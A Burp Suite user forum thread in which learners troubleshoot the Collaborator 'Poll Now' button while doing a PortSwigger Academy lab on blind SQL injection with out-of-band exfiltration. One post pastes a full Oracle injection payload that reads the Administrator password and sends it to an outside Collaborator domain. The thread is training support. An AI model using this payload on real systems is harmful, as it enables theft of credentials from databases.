Burp Suite User Forum

Login to post

Burp Collaborator | 'Poll Now' Function Not Working

Abdurrahman | Last updated: Sep 02, 2020 12:42PM UTC

Hi, I am trying to complete the 'Blind SQL injection with out-of-band data exfiltration' PortSwigger Academy Lab but cannot get the Burp Collaborator Client to work. I have looked at various solutions to this lab online but every time I click on 'Poll Now', nothing happens. The only thing I can think of is that my workplace firewall is interfering. Any ideas as to the RC of this issue or a way to check if the firewall is interfering?

Uthman, PortSwigger Agent | Last updated: Sep 02, 2020 03:23PM UTC

Are you using the instructions provided in the lab? I have just double-checked the lab and everything should be working as expected. If you ping or perform a DNS lookup to the public collaborator server from your workspace, do you receive a response? Can you also try the below? 1. Open the collaborator client in Burp (Burp > Collaborator Client) 2. Copy to clipboard 3. Paste the URL in a browser 4. Poll now Do you see any response to the steps above?

Bittu | Last updated: Dec 29, 2020 07:19AM UTC

Same for me, any suggestions

Liam, PortSwigger Agent | Last updated: Dec 30, 2020 01:52PM UTC

If you ping or perform a DNS lookup to the public collaborator server from your workspace, do you receive a response? Can you also try the below? 1. Open the collaborator client in Burp (Burp > Collaborator Client) 2. Copy to clipboard 3. Paste the URL in a browser 4. Poll now

Crypto | Last updated: Jan 25, 2021 11:35PM UTC

Mine is working in a browser but not working when doing lab. Any solutions?

Liam, PortSwigger Agent | Last updated: Jan 26, 2021 02:42PM UTC

To clarify, what is not working when performing the lab exercise?

Julien | Last updated: Mar 13, 2021 09:04PM UTC

Same for me : I cannot complete the lab even with the solution : When performing the lab, the Poll now button doesn't return any interaction. but when I'm going to the collaborator url, when I click on Poll now, I have an interaction. What's could be wrong ?

Liam, PortSwigger Agent | Last updated: Mar 16, 2021 08:20AM UTC

Have you checked out this video solution? - https://www.youtube.com/watch?v=YTIKBPlPuLA

Vighnesh | Last updated: May 28, 2021 06:24AM UTC

I'm facing the same problem. I inject the payload, click forward, and then go back to the collaborator client and click on "poll now" but nothing shows up. I tried waiting for a couple of minutes as the query is executing asynchronously, but the dns lookup still doesn't show up on the client. It does show up when I try to access it via the browser.

Ben, PortSwigger Agent | Last updated: May 28, 2021 10:35AM UTC

Hi, I have just run through this lab and was able to solve it successfully using the solution provided so it is functioning as expected. Can you provide details of what your payload looks like? Have you altered the payload so that it is reflecting the unique Burp Collaborator payload that you created with the 'Copy to clipboard' action in step 3?

Vighnesh | Last updated: May 28, 2021 02:05PM UTC

Hi, Yes, I did add the unique Burp Collaborator link to the payload. I entered the following payload: '+union+SELECT+extractvalue(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3a//'||(SELECT+password+FROM+users+WHERE+username%3d'Administrator')||'.8cldwglmk699yr1svy0ch5cl9cf33s.burpcollaborator.net/">+%25remote%3b]>'),'/l')+FROM+dual--

Ben, PortSwigger Agent | Last updated: May 28, 2021 02:49PM UTC

Hi, Just to confirm, you have left the Burp Collaborator client window open whilst you have been working on this lab (you have not, for example, closed and reopened it at any point)? Also, have you entered your payload as part of the TrackingId cookie that was obtained from the home page i.e. TrackingId=x'+UNION+SELECT+EXTRACTVALUE..... and then issued this request either by forwarding the intercepted, modified request or sending it via Repeater?

Vighnesh | Last updated: May 28, 2021 03:45PM UTC

Hi, Yes, I did exactly as the solution says. I did not close or reopen the collaborator client at any point.

Ben, PortSwigger Agent | Last updated: Jun 01, 2021 08:02AM UTC

Hi, It might be useful if you send us an email at support@portswigger.net with some screenshots of what you have carried out at each stage of the solution so that we can take a look for you.

Amandine | Last updated: Jun 10, 2021 12:14AM UTC

I seem to have the same problem. That does not work for me neither and I did what the guy shown in the video... Nothing happens when I click Poll now.

Amandine | Last updated: Jun 10, 2021 12:14AM UTC

I seem to have the same problem. That does not work for me neither and I did what the guy shown in the video... Nothing happens when I click Poll now.

Ben, PortSwigger Agent | Last updated: Jun 10, 2021 07:19AM UTC

Hi, Are you able to provide us with some details of the steps that you have taken to solve this lab so far so that we can try and assist you further?

You need to Log in to post a reply. Or register here, for free.